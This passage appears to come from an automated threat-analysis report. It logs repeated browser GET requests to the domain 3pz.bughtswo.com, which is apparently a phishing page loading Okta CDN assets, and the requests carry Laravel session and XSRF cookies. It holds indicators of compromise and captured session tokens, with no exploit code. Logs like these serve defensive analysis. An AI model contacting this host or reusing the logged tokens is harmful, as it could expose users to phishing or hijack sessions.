en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxFhzp0CgTafW2l0GEvW2qmRzDYozFmnbQAb174rg3tC0nv90180 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnGeMwtuiseg6FuvHXI23EgklvYhJt1DtbpXmd9tZGrz78150 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxFhzp0CgTafW2l0GEvW2qmRzDYozFmnbQAb174rg3tC0nv90180 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opBd8RIsQEhweDF79MfJTmO32LcCxDbe4QgnBMPgPPghFozKdpmUpA5eLxsl9zJJ0KlUUZOyAEef196 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ghd1fCTJC2y4qjPZfLjhBbrPNhMv0H3ioowRZtB1smn00n8zWKAwWMYfyyL9TI13NS5A412210 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opuxRiSxTmEM15vBJMb9leXlu5sefNsAugLT2OPWIt7nw45140 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kl3XiVz0aPutz6bSmjR9D2P593BDt6Z4DUWuOyzYQYdRIcPOAJBMuwV98WwDp5V256170 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opwzYslPhX1AtOROVu3V2KXjF2vYFIQTFKpREUQCrAUstQdhMWnYFFGrFe6cfvB6BRzktecd232 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvoKKbZekhhECC44QCCbjXEKE2C1RQMtxPtj677UAOI8HCXxWVsm7VzpvJUgh260 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxB2I98tBROJelAq0Qq5WjZ6UMxcstFpC8Y9kgRgGII0H34126 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /opBd8RIsQEhweDF79MfJTmO32LcCxDbe4QgnBMPgPPghFozKdpmUpA5eLxsl9zJJ0KlUUZOyAEef196 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opwzYslPhX1AtOROVu3V2KXjF2vYFIQTFKpREUQCrAUstQdhMWnYFFGrFe6cfvB6BRzktecd232 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ghd1fCTJC2y4qjPZfLjhBbrPNhMv0H3ioowRZtB1smn00n8zWKAwWMYfyyL9TI13NS5A412210 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
